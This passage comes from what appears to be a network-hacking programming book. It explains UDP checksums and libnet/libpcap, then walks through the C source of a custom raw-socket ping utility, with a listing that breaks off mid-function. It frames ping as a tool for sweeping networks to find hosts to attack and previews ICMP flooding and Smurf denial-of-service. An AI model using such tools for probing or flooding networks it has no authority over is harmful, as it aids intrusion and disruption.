• UDP Header Checksum. This checksum is calculated in the same way as the TCP header checksum; that is, a 96-bit pseudo header placed before the UDP header is used in the calculation. This pseudo header is not sent to the network and is only used to calculate the checksum. The structure of the UDP pseudo header is virtually the same as that of the TCP pseudo header (Listing 3.8), the only differences being the value of the Protocol field (17 for UDP instead of 6 for TCP) and the length of the UDP packet specified in the Length field (see Fig. 3.11). The length of the UDP packet is the overall length of the UDP header and the data field in bytes.
Fig. 3.11. The pseudo header for calculating the UDP header checksum (Source address, 32 bits; Destination address, 32 bits; zero byte and Protocol; Length of UDP header + data, 16 bits)


Thus, when calculating the checksum for the UDP header, the in_cksum() function must be passed the starting address of the pseudo header and the total length of the pseudo header, UDP header, and data field.

There is one important specification concerning the UDP header checksum in RFC 768 that is absent from the specifications of the other protocols. It states the following: If the computed checksum is zero, it is transmitted as all ones (the equivalent in one's complement arithmetic). An all-zero transmitted checksum value means that the transmitter generated no checksum.

Thus, you must check the value of the UDP header checksum returned by the in_cksum() function and replace it with 0xffff if it is zero. This procedure does not have to be performed for the other headers, because for the IP, TCP, and ICMP headers a zero checksum does not mean that it was not calculated.
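Combining the pseudo header, the zeroed checksum field, and the RFC 768 rule, a UDP checksum can be sketched as follows. The pseudo header and the UDP segment are copied into one scratch buffer so that they lie contiguously; the 1500-byte limit on the segment is an arbitrary assumption, the function names are hypothetical, and csum_bytes() is a byte-buffer version of the same algorithm as in_cksum().

```c
#include <arpa/inet.h>   /* htons() */
#include <stddef.h>
#include <string.h>

/* One's complement checksum over a byte buffer. */
static unsigned short csum_bytes(const unsigned char *p, size_t len)
{
    unsigned long sum = 0;
    unsigned short word;

    for (; len > 1; p += 2, len -= 2) {
        memcpy(&word, p, 2);
        sum += word;
    }
    if (len == 1) {                    /* pad the odd byte on the right */
        word = 0;
        memcpy(&word, p, 1);
        sum += word;
    }
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (unsigned short)~sum;
}

/* Compute and store the checksum of a UDP segment (header + data, len
 * bytes). saddr/daddr are IPv4 addresses in network byte order.
 * Returns 0 on success, -1 if len is out of range. */
static int udp_set_checksum(unsigned char *udp, size_t len,
                            const unsigned char saddr[4],
                            const unsigned char daddr[4])
{
    unsigned char buf[12 + 1500];      /* pseudo header + segment */
    unsigned short ulen, ck;

    if (len < 8 || len > sizeof buf - 12)
        return -1;
    memcpy(buf, saddr, 4);             /* source address */
    memcpy(buf + 4, daddr, 4);         /* destination address */
    buf[8] = 0;                        /* zero byte */
    buf[9] = 17;                       /* protocol: UDP */
    ulen = htons((unsigned short)len); /* UDP header + data length */
    memcpy(buf + 10, &ulen, 2);
    udp[6] = udp[7] = 0;               /* zero the checksum field first */
    memcpy(buf + 12, udp, len);
    ck = csum_bytes(buf, 12 + len);
    if (ck == 0)
        ck = 0xffff;                   /* RFC 768: zero is sent as all ones */
    memcpy(udp + 6, &ck, 2);
    return 0;
}
```

A quick way to test such code is to recompute the checksum over the pseudo header and the finished segment: with a correct checksum in place, the result is 0.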

An important thing to remember is that if a single byte in the header or in the data field 
changes, the checksum must be recalculated. For example, if the value of the time-to-live 
(TTL) field in the IP header changes, the checksum field in this header must be recalculated. 

Before the checksum is calculated, the checksum field must be zeroed out. This RFC requirement applies to all the headers considered. Therefore, in the example programs, the checksum field is set to 0 before the in_cksum() function is called.


3.7. Nonstandard Libraries 


To make the task of writing network utilities easier, you can take advantage of nonstandard 
third-party libraries, the best known of which are libnet and libpcap. 

The libnet library (http://www.packetfactory.net/projects/libnet/) provides program- 
mers with all necessary tools and utilities for generating packets of any format and content. 

The libpcap library (http://www.tcpdump.org) serves the reverse purpose: extracting 
packets from the network and analyzing them. 

Both libraries can be used in a program at the same time. 

Many well-known utilities are built on these libraries; for example, tcpdump and the latest versions of nmap use libpcap. For the most part, however, hackers avoid using nonstandard libraries when developing their tools so as not to make their code dependent on those libraries. Otherwise, the necessary libraries would have to be installed before the utility could be used, which is inconvenient and often impossible. Using the libnet and libpcap libraries to program network hacker software is considered in Chapter 9.


Chapter 4: Ping Utility 








The ping utility is a standard utility in any full-featured operating system. The original pur- 
pose of this utility is to check the availability of a remote host, not to be used as a network 
hacking tool. But hackers can use ping to probe the network (ping sweep) for computers to 
attack. Nowadays, administrators use firewalls to block incoming and outgoing ICMP mes- 
sages on both individual computers and network gateways, which makes probing using ping 
ineffective. Nevertheless, it is important to know the internal workings of ping, because many 
network attack utilities are based on the same operation principles, for example, denial-of- 
service ICMP flooding and Smurf (see Chapter 6). Also, ping is frequently integrated with 
network scanning utilities (see Chapter 7). 


4.1. General Operation Principle 


The ping utility was created by the late Mike Muuss, a former employee of the U.S. Army Bal- 
listic Research Laboratory, who wrote the first version of ping in 1983 for the 4.2a BSD UNIX 
operating system. The name ping is not an acronym, nor was it randomly selected by Muuss. 
According to his site (http://ftp.arl.mil/~mike), the utility was named after the sound sonar 
makes. The ping utility imitates sonar or radar operation in computer networks. It sends 
ICMP echo requests to the specified IP address or host name, receives ICMP echo replies, and 
calculates the round-trip time for the packets. 

The following is an example of invoking ping in Linux and the results it produces: 

# ping 192.168.10.1
PING 192.168.10.1 (192.168.10.1) from 192.168.10.130 : 56(84) bytes of data.
64 bytes from 192.168.10.1: icmp_seq=0 ttl=255 time=6.760 msec
64 bytes from 192.168.10.1: icmp_seq=1 ttl=255 time=411 usec
64 bytes from 192.168.10.1: icmp_seq=2 ttl=255 time=301 usec
64 bytes from 192.168.10.1: icmp_seq=3 ttl=255 time=375 usec
64 bytes from 192.168.10.1: icmp_seq=4 ttl=255 time=369 usec
64 bytes from 192.168.10.1: icmp_seq=5 ttl=255 time=299 usec
64 bytes from 192.168.10.1: icmp_seq=6 ttl=255 time=355 usec
64 bytes from 192.168.10.1: icmp_seq=7 ttl=255 time=366 usec
64 bytes from 192.168.10.1: icmp_seq=8 ttl=255 time=291 usec

--- 192.168.10.1 ping statistics ---
9 packets transmitted, 9 packets received, 0% packet loss
round-trip min/avg/max/mdev = 0.291/1.058/6.760/2.016 ms

The utility places the output data in the following columns: the number of received bytes, the IP address and the name (if there is one) of the host being probed, the sequence number of the packet (icmp_seq), the packet’s TTL as specified in the IP header, and the calculated round-trip time. By default, the utility sends and receives ICMP packets until the <Ctrl>+<C> key combination is pressed. After the program is terminated, it outputs statistics: the numbers of transmitted and received packets, the percentage of lost packets, and the minimum, average, and maximum packet round-trip times. Later versions of ping also output the mdev parameter. Unfortunately, I have not been able to find a single mention of this parameter in the utility’s man page, but as far as I can judge from the parameter’s name, it shows the standard deviation. Because this parameter belongs to the statistics domain, I will not consider it when developing a custom ping utility.
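Although mdev is left out of the custom utility, the whole statistics line is easy to reproduce. The following sketch assumes that mdev is the population standard deviation of the round-trip times, that is, the square root of the mean of the squares minus the square of the mean. With the nine times from the sample output above, this assumption does give 2.016 ms. The rtt_summary() function and the rtt_stats structure are hypothetical names, and the square root is computed with Newton's method only so that the example links without -lm; real code would call sqrt() from <math.h>.

```c
#include <stddef.h>

/* Summary statistics; all values in milliseconds. */
struct rtt_stats {
    double min, avg, max, mdev;
};

/* Square root by Newton's method (stand-in for sqrt() to avoid -lm). */
static double newton_sqrt(double x)
{
    double g = x > 1.0 ? x : 1.0;
    int i;

    if (x <= 0.0)
        return 0.0;
    for (i = 0; i < 60; i++)
        g = 0.5 * (g + x / g);
    return g;
}

/* Hypothetical helper: min/avg/max plus mdev, taken here to be the
   population standard deviation sqrt(mean(x^2) - mean(x)^2). */
struct rtt_stats rtt_summary(const double *rtt, size_t n)
{
    struct rtt_stats s = {0.0, 0.0, 0.0, 0.0};
    double sum = 0.0, sum2 = 0.0;
    size_t i;

    if (n == 0)
        return s;
    s.min = s.max = rtt[0];
    for (i = 0; i < n; i++) {
        if (rtt[i] < s.min) s.min = rtt[i];
        if (rtt[i] > s.max) s.max = rtt[i];
        sum += rtt[i];
        sum2 += rtt[i] * rtt[i];
    }
    s.avg = sum / n;
    s.mdev = newton_sqrt(sum2 / n - s.avg * s.avg);
    return s;
}
```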

Echo replies normally arrive in the order in which the requests were sent, although IP does not guarantee this. Because packets can be lost during transmission, there may be gaps in the sequence numbers, and in the statistics the number of received ICMP messages may differ from the number of sent messages.

Using the open source code of the ping utility, I show you how to write a custom version of this program. The chief difference between the custom and the publicly available versions is that the custom program does not support command line parameters. The standard utility has about 20 of them, and their number grows with every new version. Rather than being a drawback, the absence of command line parameters is an advantage, because it allows you to understand the main operating principles of the utility without being distracted by multiple parameters. I personally derived substantial help in understanding how the ping utility works from the book UNIX Network Programming by Richard Stevens, which considers implementation of the ping utility for both IPv4 and IPv6.

The ping operation is based on ICMP, so you need to recall the format of ICMP messages. 
The format depends on the message type; the main types are given in Table 3.1. 

For the task at hand, of interest are only two types of ICMP messages: echo request and 
echo reply, which have the same format (see Fig. 3.9). 

The type field holds 0 for the echo reply message and 8 for the echo request message. The code field always holds 0 for both types of messages. The checksum must be calculated and entered into the checksum field. The algorithm for calculating the checksum is described in RFC 792, and Listing 3.7 gives the source code, in C, of a function for calculating it, which will be used in the custom program. The identifier and sequence number fields can be used by the sender of echo messages to identify arriving packets. The ping utility places its PID into the identifier field and increments the sequence number by 1 for each sent packet. The data field may contain arbitrary data; ping saves a time stamp of the packet's departure in this field, which allows the packet's round-trip time to be calculated when the reply is received. Pursuant to RFC 792, the contents of the identifier, sequence number, and data fields must be returned unchanged in the echo reply message.

For the custom utility, the definition of the ICMP structure from the /netinet/ip_icmp.h header file will be used. Look at the icmp structure in this header file; note that it is somewhat different from the structure shown in Listing 3.6. This structure describes all types of ICMP messages at once. According to the echo request and echo reply formats, only the following fields will be needed for the custom ping utility: icmp_type, icmp_code, icmp_cksum, icmp_id, icmp_seq, and icmp_data. Some of these field names are macros that stand for more complex constructions:

#define icmp_id    icmp_hun.ih_idseq.icd_id
#define icmp_seq   icmp_hun.ih_idseq.icd_seq
#define icmp_data  icmp_dun.id_data
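Because these names are macros, it is easy to lose track of where the fields actually lie. The following compile-time check is a sketch that assumes glibc's BSD-style struct icmp (made visible here with _DEFAULT_SOURCE). It confirms that the fields fall on the offsets of the echo message format: type at byte 0, code at byte 1, checksum at bytes 2-3, identifier at bytes 4-5, sequence number at bytes 6-7, and data from byte 8 on.

```c
#define _DEFAULT_SOURCE 1          /* BSD-style struct icmp in glibc */
#include <stddef.h>
#include <netinet/ip_icmp.h>

/* The shorthand names expand into nested union members, but they still
   land on the offsets required by the echo request/reply format. */
_Static_assert(offsetof(struct icmp, icmp_type)  == 0, "type at byte 0");
_Static_assert(offsetof(struct icmp, icmp_code)  == 1, "code at byte 1");
_Static_assert(offsetof(struct icmp, icmp_cksum) == 2, "checksum at byte 2");
_Static_assert(offsetof(struct icmp, icmp_id)    == 4, "identifier at byte 4");
_Static_assert(offsetof(struct icmp, icmp_seq)   == 6, "sequence number at byte 6");
_Static_assert(offsetof(struct icmp, icmp_data)  == 8, "data at byte 8");
```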

All ICMP messages are carried in IP datagrams whose header has the protocol field set to 1 (IPPROTO_ICMP). The format of the IP header is shown in Fig. 3.5; its full description can be found in RFC 791. The IP header structure is defined in the /netinet/ip.h header file, which will also be included in the custom ping utility.

Figure 4.1 shows a diagram of the ICMP message with the IP header and with the names 
of the pointers and lengths that will be used in the program when processing echo replies. 


[Figure: the received buffer starts with the IP header (20-60 bytes; pointer ip, length iplen), followed by the ICMP header and data (pointer icmp, length icmplen)]

Fig. 4.1. Headers, pointers, and lengths used in processing of ICMP replies
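In code, the layout in Fig. 4.1 comes down to a little pointer arithmetic. The sketch below does what the first lines of output() in Listing 4.1 do, but it also rejects buffers too short to hold both headers. The name find_icmp() is hypothetical. The ip_hl field counts 32-bit words, hence the shift by 2, and the buffer is assumed to be suitably aligned for struct ip.

```c
#define _DEFAULT_SOURCE 1          /* BSD-style struct ip / struct icmp in glibc */
#include <stddef.h>
#include <stdint.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/* Hypothetical helper: buf holds what recvfrom() returned on a raw ICMP
   socket, starting with the IP header. Returns a pointer to the ICMP
   header and stores the ICMP length (header + data) in *icmplen, or
   returns NULL if the buffer cannot hold both headers. */
const struct icmp *find_icmp(const unsigned char *buf, size_t len, size_t *icmplen)
{
    const struct ip *ip = (const struct ip *) buf;
    size_t iplen;

    if (len < sizeof(struct ip))
        return NULL;
    iplen = (size_t) ip->ip_hl << 2;        /* header length in bytes */
    if (iplen < 20 || len < iplen + 8)      /* need the 8-byte ICMP header */
        return NULL;

    *icmplen = len - iplen;
    return (const struct icmp *) (buf + iplen);
}
```

The caller then checks icmp_type and icmp_id, exactly as output() does.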


You may have noticed that the ICMP message has no source and destination port fields. This raises the question of what service sends echo replies to echo requests. In fact, there are no special applications or services waiting for echo requests; echo replies are generated by the IP subsystem of a node. When an IP subsystem receives a type 8 (echo request) ICMP message, it must send a reply. To this end, it swaps the source and destination addresses, changes the message type to 0 (echo reply), and recalculates the checksum.
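The replying node's behavior can be modeled in a few lines. The following is a simplified, hypothetical illustration that works on a buffer holding an IPv4 packet; it does not describe any particular kernel. A real IP stack builds a fresh IP header for the reply, whereas this sketch only swaps the addresses. Incidentally, the swap leaves the IP header checksum unchanged, because the one's-complement sum does not depend on the order of the words. The names make_echo_reply() and cksum16() are made up for the example.

```c
#define _DEFAULT_SOURCE 1          /* BSD-style struct ip / struct icmp in glibc */
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/* One's-complement checksum, same algorithm as in_cksum(). */
static uint16_t cksum16(const void *data, size_t len)
{
    const uint8_t *p = data;
    uint32_t sum = 0;
    uint16_t word;

    for (; len > 1; p += 2, len -= 2) {
        memcpy(&word, p, 2);
        sum += word;
    }
    if (len == 1) {
        word = 0;
        memcpy(&word, p, 1);
        sum += word;
    }
    sum = (sum >> 16) + (sum & 0xFFFF);
    sum += (sum >> 16);
    return (uint16_t) ~sum;
}

/* Hypothetical illustration: turn an IPv4 packet holding an ICMP echo
   request into the matching echo reply, in place. Returns 0 on success,
   -1 if the packet is too short or is not an echo request. */
int make_echo_reply(unsigned char *pkt, size_t len)
{
    struct ip *ip = (struct ip *) pkt;
    struct icmp *icmp;
    struct in_addr tmp;
    size_t iplen;

    if (len < sizeof(struct ip))
        return -1;
    iplen = (size_t) ip->ip_hl << 2;
    if (iplen < sizeof(struct ip) || len < iplen + 8)
        return -1;
    icmp = (struct icmp *) (pkt + iplen);
    if (icmp->icmp_type != ICMP_ECHO)
        return -1;

    tmp = ip->ip_src;                  /* swap source and destination */
    ip->ip_src = ip->ip_dst;
    ip->ip_dst = tmp;

    icmp->icmp_type = ICMP_ECHOREPLY;  /* type 8 becomes type 0 */
    icmp->icmp_cksum = 0;              /* id, seq and data stay untouched */
    icmp->icmp_cksum = cksum16(icmp, len - iplen);
    return 0;
}
```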
4.2. Constructing a Custom Ping Utility


The source code for the custom ping utility is shown in Listing 4.1. I called it xping.c to distinguish it from the standard system utility.

Consider the main problems that must be solved when programming a ping utility. 

For receiving and sending ICMP messages, a raw socket (SOCK_RAW) must be created with the socket() function, with the IPPROTO_ICMP constant specified as the protocol:

sd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);


Although the IPPROTO_ICMP constant is defined in the /netinet/in.h header file, it is not necessary to include this file in the program, because it is included by the /netinet/ip.h and /netinet/ip_icmp.h header files.

Only privileged users can create a raw socket; therefore, the standard Linux ping utility has the set user identifier (SUID) bit set (note the s in place of the owner's x in the ls output):

$ ls -l /bin/ping

-rwsr-xr-x 1 root root 22620 Jan 16 2001 /bin/ping

After the custom ping utility is compiled and built, it can also be given the SUID bit so that regular users can run it.

In the program itself, the original user rights are restored with the setuid() function right after the raw socket is created:

setuid(getuid());
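The listing does not check whether setuid() succeeds. A slightly more defensive version of these two steps might look like the following sketch; open_icmp_socket() is a hypothetical helper name. It drops privileges even when socket() fails, and it refuses to continue if the privileges cannot be dropped.

```c
#include <errno.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

/* Hypothetical helper: create the raw ICMP socket while the SUID root
   identity is still in effect, then drop back to the real user ID.
   Returns the socket descriptor, or -1 with errno set. */
int open_icmp_socket(void)
{
    int sd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
    int saved_errno = errno;

    /* Give up privileges even if socket() failed; stop if impossible */
    if (setuid(getuid()) != 0) {
        saved_errno = errno;
        perror("setuid() failed");
        if (sd >= 0)
            close(sd);
        errno = saved_errno;
        return -1;
    }
    if (sd < 0) {
        errno = saved_errno;           /* report why socket() failed */
        return -1;
    }
    return sd;
}
```

Run by an ordinary user without the SUID bit, the function simply returns -1 with errno set to EPERM.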


For the utility to be able to send broadcast messages, the SO_BROADCAST socket option is set using the setsockopt() function:

setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &on, sizeof(on));


The standard ping utility sends broadcast messages only when the -b option is specified on the command line. This precaution is well justified, because a broadcast echo request sent into a network with many nodes may cause denial of service at the sending node, which receives a flood of echo replies.

To prevent numerous echo replies from overflowing the receiving buffer, its size is set to 61,440 bytes (60 x 1,024), which is sufficiently large and larger than the default buffer size in the standard utility. The receiving buffer size is set using the setsockopt() function with the SO_RCVBUF option:

size = 60 * 1024;
setsockopt(sd, SOL_SOCKET, SO_RCVBUF, &size, sizeof(size));
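Both setsockopt() calls in the listing ignore their return values. The hypothetical tune_socket() helper below does the same work but reports failures. Since neither option requires a raw socket, it can be tried on an ordinary UDP socket.

```c
#include <stdio.h>
#include <sys/socket.h>

/* Hypothetical helper: enable broadcasting and set the receive buffer
   size on sd, checking each setsockopt() call. Returns 0 or -1. */
int tune_socket(int sd, int rcvbuf)
{
    const int on = 1;

    if (setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &on, sizeof(on)) < 0) {
        perror("setsockopt(SO_BROADCAST) failed");
        return -1;
    }
    if (setsockopt(sd, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof(rcvbuf)) < 0) {
        perror("setsockopt(SO_RCVBUF) failed");
        return -1;
    }
    return 0;
}
```

Note that on Linux the kernel limits the requested SO_RCVBUF value to net.core.rmem_max and then doubles it to leave room for bookkeeping. As a result, reading the option back with getsockopt() will not simply return 61,440.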

The standard ping utility sends echo requests at the rate of one per second; therefore, for 
the custom utility, the setitimer() function is used to set the timer to generate the SIGALRM 
signal every second during the program run: 

struct itimerval timer;

/* Starting a timer to send the SIGALRM signal */
/* Timer will kick in after 1 microsecond */
timer.it_value.tv_sec = 0;
timer.it_value.tv_usec = 1;

/* Timer will activate every second */
timer.it_interval.tv_sec = 1;
timer.it_interval.tv_usec = 0;

/* Starting the real-time timer */
setitimer(ITIMER_REAL, &timer, NULL);

To intercept the SIGALRM signal, a signal handler is set using the sigaction() function: 


/* Setting the handler for the SIGALRM and SIGINT signals */
memset(&act, 0, sizeof(act));

/* The catcher() function is assigned as the handler */
act.sa_handler = &catcher;

sigaction(SIGALRM, &act, NULL);


The handler for the signal is the catcher() function; when the SIGALRM signal arrives, it simply calls the pinger() function, which sends echo requests:

void catcher(int signum)
{
    if (signum == SIGALRM)
    {
        pinger();
        return;
    }
    ...
}

Thus, every second the program calls the pinger() function, which sends one echo re- 
quest per call. 

After the program is terminated (the user presses the <Ctrl>+<C> key combination), it must output statistics on the transmitted and received packets. This key combination sends the SIGINT signal, so a handler for this signal must also be installed:

sigaction(SIGINT, &act, NULL);

The signal will be handled by the same catcher() function.

The packet round-trip time is calculated using the following simple solution: before an echo request is sent, the current system time is obtained with the gettimeofday() function and entered into the data field (icmp->icmp_data) of the ICMP packet being sent:

gettimeofday((struct timeval *) icmp->icmp_data, NULL);


As already mentioned, the contents of the data field in an echo reply message must be identical to those of the corresponding echo request message. When an echo reply is received, the current system time is obtained again using the gettimeofday() function, and the difference between the current system time and the time saved in the packet is the round-trip time sought. In the program, this difference is computed by the tv_sub() function, which subtracts one timeval structure from another and saves the result in the first one. The number of seconds in the current system time (out->tv_sec) cannot be less than the number of seconds saved in the arriving echo reply (in->tv_sec). The number of microseconds (tv_usec), however, can be. Therefore, if the microsecond difference is negative, 1 second must be subtracted from the seconds result and 1,000,000 added to the negative microsecond result to produce a correctly normalized value.

Then the packet's round-trip time is converted from microseconds to milliseconds: 

rtt = tvrecv->tv_sec * 1000.0 + tvrecv->tv_usec / 1000.0; 
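Put together, the time-stamp arithmetic is small enough to test in isolation. The tv_sub() below follows the normalization described above. rtt_ms() is a hypothetical wrapper that works on a copy of the receive time, so the caller's structure is not modified (the listing's output() modifies tvrecv in place).

```c
#include <sys/time.h>

/* out = out - in, normalizing tv_usec into the range 0..999999. */
void tv_sub(struct timeval *out, const struct timeval *in)
{
    if ((out->tv_usec -= in->tv_usec) < 0) {
        out->tv_sec--;                 /* borrow one second */
        out->tv_usec += 1000000;
    }
    out->tv_sec -= in->tv_sec;
}

/* Hypothetical wrapper: round-trip time in milliseconds. */
double rtt_ms(struct timeval recv, const struct timeval *sent)
{
    tv_sub(&recv, sent);               /* recv is a local copy */
    return recv.tv_sec * 1000.0 + recv.tv_usec / 1000.0;
}
```

For instance, a request sent at 5.900000 s and answered at 6.100250 s gives a difference of 0 s and 200,250 microseconds, which rtt_ms() reports as 200.25 ms.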


Before a packet is sent, all fields of the ICMP message must be filled in. This is done in the pinger() function.

The type field (icmp->icmp_type) is set to the message type. The ICMP_ECHO constant is defined in the /netinet/ip_icmp.h header file; some of the other message type constants are given in Section 3.4.6.

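The identifier field (icmp->icmp_id) is set to the PID of the program process. This value is checked when an echo reply message arrives: if multiple copies of the program are running, it is used to pick out only the replies addressed to the current process. Because the identifier field is only 16 bits wide, only the low-order 16 bits of the PID are actually stored in it.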

The sequence number field (icmp->icmp_seq) is set to the packet’s sequence number, taken from the nsent global variable, which is incremented by 1 for each packet sent.

Pursuant to RFC 792, the checksum field (icmp->icmp_cksum) must be zeroed out before the checksum is computed. Then the checksum is calculated using the in_cksum() function, and the result is stored in the checksum field.

There is also a checksum field in the IP header; this checksum is calculated using the same algorithm, but only over the header, not over the entire packet. No fields in the IP header, including the checksum field, have to be filled in manually, because all this is done by the IP subsystem.

The in_cksum() function is passed the length of the ICMP header and data in the icmplen variable. The ICMP header is only 8 bytes long, but 56 bytes are traditionally allocated for data. The timeval structure takes 8 bytes on 32-bit systems (16 bytes on typical 64-bit systems), and the remaining bytes are filled with whatever happens to be in the buffer. I will not depart from the tradition initiated by Mike Muuss and will allocate 56 bytes for data. Thus, icmplen will be 64 bytes.
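The steps of pinger() can be checked without a raw socket by building the message in a buffer. The sketch below is a hypothetical variant, build_echo_request(), that differs from the listing in two ways. It zeroes the 56-byte data area instead of sending whatever is in the buffer, and it copies the time stamp with memcpy() rather than writing through a cast pointer. It uses the same checksum algorithm as in_cksum(), here under the name cksum16().

```c
#define _DEFAULT_SOURCE 1          /* BSD-style struct icmp in glibc */
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/time.h>
#include <netinet/ip_icmp.h>

#define ECHO_HDRLEN   8            /* ICMP echo header */
#define ECHO_DATALEN 56            /* traditional ping payload */

_Static_assert(sizeof(struct timeval) <= ECHO_DATALEN, "time stamp must fit");

/* One's-complement checksum, same algorithm as in_cksum(). */
static uint16_t cksum16(const void *data, size_t len)
{
    const uint8_t *p = data;
    uint32_t sum = 0;
    uint16_t word;

    for (; len > 1; p += 2, len -= 2) {
        memcpy(&word, p, 2);
        sum += word;
    }
    if (len == 1) {
        word = 0;
        memcpy(&word, p, 1);
        sum += word;
    }
    sum = (sum >> 16) + (sum & 0xFFFF);
    sum += (sum >> 16);
    return (uint16_t) ~sum;
}

/* Hypothetical helper mirroring pinger() minus the sendto() call.
   buf must hold ECHO_HDRLEN + ECHO_DATALEN bytes and be suitably
   aligned for struct icmp. Returns the message length (64). */
int build_echo_request(unsigned char *buf, uint16_t id, uint16_t seq)
{
    struct icmp *icmp = (struct icmp *) buf;
    struct timeval now;

    memset(buf, 0, ECHO_HDRLEN + ECHO_DATALEN);   /* zeros instead of trash */
    icmp->icmp_type = ICMP_ECHO;                   /* 8 */
    icmp->icmp_code = 0;
    icmp->icmp_id = id;                            /* host byte order, as in pinger() */
    icmp->icmp_seq = seq;

    gettimeofday(&now, NULL);                      /* departure time stamp */
    memcpy(buf + ECHO_HDRLEN, &now, sizeof(now));

    icmp->icmp_cksum = 0;                          /* zero before summing */
    icmp->icmp_cksum = cksum16(buf, ECHO_HDRLEN + ECHO_DATALEN);
    return ECHO_HDRLEN + ECHO_DATALEN;
}
```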

You should be able to understand the rest of the program source code with the help of the 
comments given in the code (Listing 4.1). 

The source code for the custom ping utility can be found in the \PART II\Chapter 4 
folder on the accompanying CD-ROM. 





Listing 4.1. The source code for the custom ping utility (xping.c)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>          /* inet_ntoa() */
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

#define BUFSIZE 1500

int sd;                         /* Socket descriptor */
pid_t pid;                      /* Program's PID */
struct sockaddr_in servaddr;    /* Structure for sending a packet */
struct sockaddr_in from;        /* Structure for receiving a packet */

double tmin = 999999999.0;      /* Minimum round-trip time */
double tmax = 0;                /* Maximum round-trip time */
double tsum = 0;                /* Sum of all times for calculating
                                   the average time */
int nsent = 0;                  /* Number of sent packets */
int nreceived = 0;              /* Number of received packets */

/* Function prototypes */
void pinger(void);
void output(char *, int, struct timeval *);
void catcher(int);
void tv_sub(struct timeval *, struct timeval *);
unsigned short in_cksum(unsigned short *, int);

/* ---------------------------------------------------------- */
/* The main() function                                        */
/* ---------------------------------------------------------- */


int main(int argc, char *argv[])
{
    int size;
    socklen_t fromlen;
    int n;
    struct timeval tval;
    char recvbuf[BUFSIZE];
    struct hostent *hp;
    struct sigaction act;
    struct itimerval timer;
    const int on = 1;

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <hostname>\n", argv[0]);
        exit(-1);
    }

    /* The ICMP identifier field is 16 bits wide, so only the
       low-order 16 bits of the PID are kept for comparisons */
    pid = getpid() & 0xffff;

    /* Setting the handler for the SIGALRM and SIGINT signals */
    memset(&act, 0, sizeof(act));

    /* Assigning the catcher() function as the handler */
    act.sa_handler = &catcher;

    sigaction(SIGALRM, &act, NULL);
    sigaction(SIGINT, &act, NULL);

    if ( (hp = gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname() failed");
        exit(-1);
    }

    if ( (sd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) {
        perror("socket() failed");
        exit(-1);
    }

    /* Restoring the initial rights */
    if (setuid(getuid()) != 0) {
        perror("setuid() failed");
        exit(-1);
    }

    /* Enabling the broadcasting capability */
    setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &on, sizeof(on));

    /* Increasing the receiving buffer size */
    size = 60 * 1024;
    setsockopt(sd, SOL_SOCKET, SO_RCVBUF, &size, sizeof(size));

    /* Filling in the destination address before the timer starts,
       so that the very first echo request goes to the right host */
    memset(&servaddr, 0, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr = *((struct in_addr *) hp->h_addr);

    /* Starting a timer to send the SIGALRM signal */
    /* Timer kicks in after 1 microsecond */
    timer.it_value.tv_sec = 0;
    timer.it_value.tv_usec = 1;

    /* Timer fires every second */
    timer.it_interval.tv_sec = 1;
    timer.it_interval.tv_usec = 0;

    /* Starting the real-time timer */
    setitimer(ITIMER_REAL, &timer, NULL);

    fromlen = sizeof(from);

    /* Starting an endless loop to receive packets */
    while (1) {
        n = recvfrom(sd, recvbuf, sizeof(recvbuf), 0,
                     (struct sockaddr *) &from, &fromlen);

        if (n < 0) {
            if (errno == EINTR)
                continue;
            perror("recvfrom() failed");
            continue;
        }

        /* Determining the current system time */
        gettimeofday(&tval, NULL);

        /* Calling the function to parse the received */
        /* packet and display the data */
        output(recvbuf, n, &tval);
    }

    return 0;
}
/* ---------------------------------------------------------- */
/* Parsing the received packet and displaying the data        */
/* ---------------------------------------------------------- */
void output(char *ptr, int len, struct timeval *tvrecv)
{
    int iplen;
    int icmplen;
    struct ip *ip;
    struct icmp *icmp;
    struct timeval *tvsend;
    double rtt;

    ip = (struct ip *) ptr;                 /* Start of the IP header */
    iplen = ip->ip_hl << 2;                 /* Length of the IP header */

    icmp = (struct icmp *) (ptr + iplen);   /* Start of the ICMP header */
    if ( (icmplen = len - iplen) < 8) {     /* Length of ICMP header + data */
        fprintf(stderr, "icmplen (%d) < 8\n", icmplen);
        return;
    }

    if (icmp->icmp_type == ICMP_ECHOREPLY) {
        if (icmp->icmp_id != pid)
            return;     /* Reply is to another ping's echo request. */
        if (icmplen < 8 + (int) sizeof(struct timeval))
            return;     /* Too short to contain our time stamp */

        tvsend = (struct timeval *) icmp->icmp_data;
        tv_sub(tvrecv, tvsend);

        /* Round-trip time */
        rtt = tvrecv->tv_sec * 1000.0 + tvrecv->tv_usec / 1000.0;

        nreceived++;
        tsum += rtt;
        if (rtt < tmin)
            tmin = rtt;
        if (rtt > tmax)
            tmax = rtt;

        printf("%d bytes from %s: icmp_seq = %u, ttl = %d, time = %.3f ms\n",
               icmplen, inet_ntoa(from.sin_addr),
               (unsigned) icmp->icmp_seq, ip->ip_ttl, rtt);
    }
}
/* ---------------------------------------------------------- */
/* Forming and sending an ICMP echo request packet            */
/* ---------------------------------------------------------- */
void pinger(void)
{
    int icmplen;
    struct icmp *icmp;
    char sendbuf[BUFSIZE];

    icmp = (struct icmp *) sendbuf;

    /* Filling all fields of the ICMP message */
    icmp->icmp_type = ICMP_ECHO;
    icmp->icmp_code = 0;
    icmp->icmp_id = pid;
    icmp->icmp_seq = nsent++;
